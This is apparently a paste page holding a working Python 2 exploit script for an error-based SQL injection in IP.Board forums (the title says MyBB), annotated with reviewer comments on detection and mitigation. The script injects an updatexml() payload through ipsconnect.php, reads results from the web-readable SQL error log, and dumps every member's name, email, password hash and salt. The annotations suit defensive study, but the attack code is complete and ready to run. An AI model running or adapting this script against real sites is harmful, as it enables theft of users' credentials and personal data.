9r3nXPaRTa

Exploit MyBB SQLi (blind, error based) By Bekasi X Code

Jun 3rd, 2015
Python 2.85 KB | None | 0 0
#!/usr/bin/env python
# Wednesday, June 03, 2014 - anon.grenxparta@gmail.com
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
# Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs
#
# NOTE(review): Python 2 only (print statements, raw_input, urllib2).
# NOTE(review): the paste title says MyBB, but this header and the request paths
# used further down (interface/ipsconnect/ipsconnect.php and
# cache/sql_error_latest.cgi) refer to IP.Board. Triage against IP.Board
# installations rather than MyBB.
# NOTE(review): the affected-version claim above is the author's; confirm it
# against the vendor advisory before using it to scope exposure.

# Start-up banner.
print '\n\n---------------------------------------------------------------------------------'
print 'Script Modified by GrenXPaRTa -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '---------Script has been modified for different table prefix XXX_members---------'
print '---------------------------------------------------------------------------------\n\n\n'
# Forum base URL, read interactively; trailing slashes are stripped so the
# fixed paths can be appended with a single '/'.
url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
url = url.rstrip('/')
# Fixed User-Agent sent with every request. For log review this exact string
# is only a weak indicator, since it is a one-line change for anyone reusing
# the script.
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

# Imports follow the first statements; this works because the modules are
# first used inside functions that are called later in the file.
import sys, re
import urllib2, urllib

# Run one SQL expression through the error-based channel and return its value.
#
# sql: SQL expression or subquery text, interpolated into the request body.
# Returns the text captured from the server's SQL error log. Every other path
# ends the process through sys.exit:
#   Error [1] - HTTP error with a status other than 503
#   Error [2] - the request completed without an HTTP error
#   Error [3] - 503 received, but the log held no matching XPATH error line
#
# Defender view (all visible in the two requests below):
#   * Request 1 carries a body (so urllib2 sends it as POST) to
#     interface/ipsconnect/ipsconnect.php with act=login, idType=id and an
#     array-valued id[] whose second element holds SQL text wrapped in
#     updatexml(). id[] values that are not plain integers are the thing to
#     alert on and to reject server-side.
#   * Request 2 reads cache/sql_error_latest.cgi over HTTP. The channel only
#     works because that error log is web-readable, so denying web access to
#     it removes this read-back path. The header comment notes that other
#     blind techniques remain, so the input handling still needs the fix.
#   * Expected traces: a 503 on ipsconnect.php followed at once by a fetch of
#     the error log from the same client, and "XPATH syntax error" entries in
#     the SQL error log.
def inject(sql):
    try:
        # The value to read is placed inside updatexml(NULL, concat(0x3a, (...)), NULL);
        # 0x3a is ':'. The resulting database error message carries the value,
        # which is what the regex below picks out of the log.
        urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        # The script treats 503 as the sign that the SQL error was triggered.
        if e.code == 503:
            data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
            # Capture the text between "XPATH syntax error: ':" and the closing quote.
            txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Error [1]')
    sys.exit('Error [2]')

# Read one column value from one row of a table through inject().
#
# name:  column name or SQL expression to select
# table: table name
# num:   zero-based row offset, used as "LIMIT num,1"
# Returns the value as a string. int() raises ValueError if the length probe
# does not come back as a number.
#
# Defender view: each value costs one length probe plus one request per
# 31-character slice, and every inject() call is a POST followed by a fetch of
# the error log. Dumping a table therefore shows up as a long, regular burst
# of 503 responses from a single client, which is practical to alert on or
# rate-limit.
def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    # Length probe first, to decide whether the value fits in one response.
    s = int(inject('LENGTH((%s))' % sqli))
    # NOTE(review): 31 is presumably the usable width of the error message
    # after the ':' prefix - confirm against the database's behaviour.
    if s < 31:
        return inject(sqli)
    else:
        # Longer values are read in 31-character SUBSTRING slices and joined.
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r


# Main sequence: locate the members table, count its rows, then print each row.
#
# 0x6d656d6265727324 is the hex form of "members$", so the REGEXP matches any
# table in the current schema whose name ends in "members". That is how the
# script copes with a custom table prefix, as the banner states.
# NOTE(review): the mixed-case 'SeLecT' looks aimed at case-sensitive keyword
# filters - confirm; filtering rules should match keywords case-insensitively.
#
# Defender view: the columns read are member_id, name, email, and
# members_pass_hash joined to members_pass_salt with ':' (0x3a). If the traces
# described for inject() appear in logs, treat member e-mail addresses and
# password hashes and salts as disclosed, and plan credential resets to match.
members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
# Row count, returned as a string and converted with int() for the loop.
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
# One pass per row; every get() call triggers its own series of requests.
for j in range(int(n)):
        print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
        print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
        print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
        print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
        print '----------------------------------------------------------------------------'